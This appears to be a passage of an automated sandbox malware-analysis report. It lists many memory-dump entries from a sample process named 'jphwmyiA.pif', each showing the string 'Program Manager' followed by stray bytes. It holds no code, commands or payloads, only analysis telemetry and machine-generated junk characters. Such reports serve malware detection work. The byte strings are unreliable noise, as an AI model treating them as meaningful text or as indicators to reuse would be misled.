                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXJ
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX4
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpT?
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\,-
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,M^
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX2
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX<
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`.4!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX7
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpU/
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@v`
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXd
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDm"!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX`
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX]
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhP+!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q Ln!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXj
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXg
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT')!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXe
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0.B!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtW6!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 1{
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXV
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8y^!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh@i
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(D,
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX!;
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLR5!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@5?!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\(f
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXs
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|ik
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXq
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|jM
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXn
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|,*!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4lq!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX|
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD3q!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXz
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpQh
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpRJ
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,?d
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`&<
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4PG!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT&
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT7X!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT"
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(E5!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhv(!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0G{
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtO>
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDG%!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0H]
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX3C!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$3_!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT?
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$0Z
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh7;
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT>
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT<
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDq_
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT9
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTF
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|`=
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTC
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$1F
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8Y\
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT-
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT+
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`~_!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|YV!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,AY
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT7
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8ZH
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|a-
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT2
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT_
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT]
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT[
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|[q
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$,z
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdv6!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTg
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|\S
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDWD!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTb
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTO
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHZ^!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\35!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTJ
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,E'!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTX
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,=y
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTT
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlK*!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtLg
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtMI
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTz
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@r#!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@i!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$.e
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|Pg!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager4
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTl
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTi
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTj
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|]f
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTx
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDot
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager(
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`3'!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$4D
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP$
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP"
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDuI
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager,
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDtg
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx\!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0qr!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(N"!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhK8!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$54
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlIj!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLZP!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP;
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP9
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPC
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPA
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP?
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8~Q!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP+
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0N<
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp ,!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qth.!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP(
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP{
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$69
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP0
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP-
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,a[!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<z<!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<as
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPY
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,BE
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@xn!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPV
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPd
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPb
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0JR
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0Ip
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$1m
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPH
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDrr
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPS
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPT
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDsT
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4 d!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPM
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qQ/
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8[Q
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8Zo
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql :!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPu
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD=L!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qph<!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,CN
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP}
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPk
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPl
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPg
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<ch
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPp
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql7
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql8
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$"D!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0``
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxnl
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDU!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(jF!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHQW!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql<
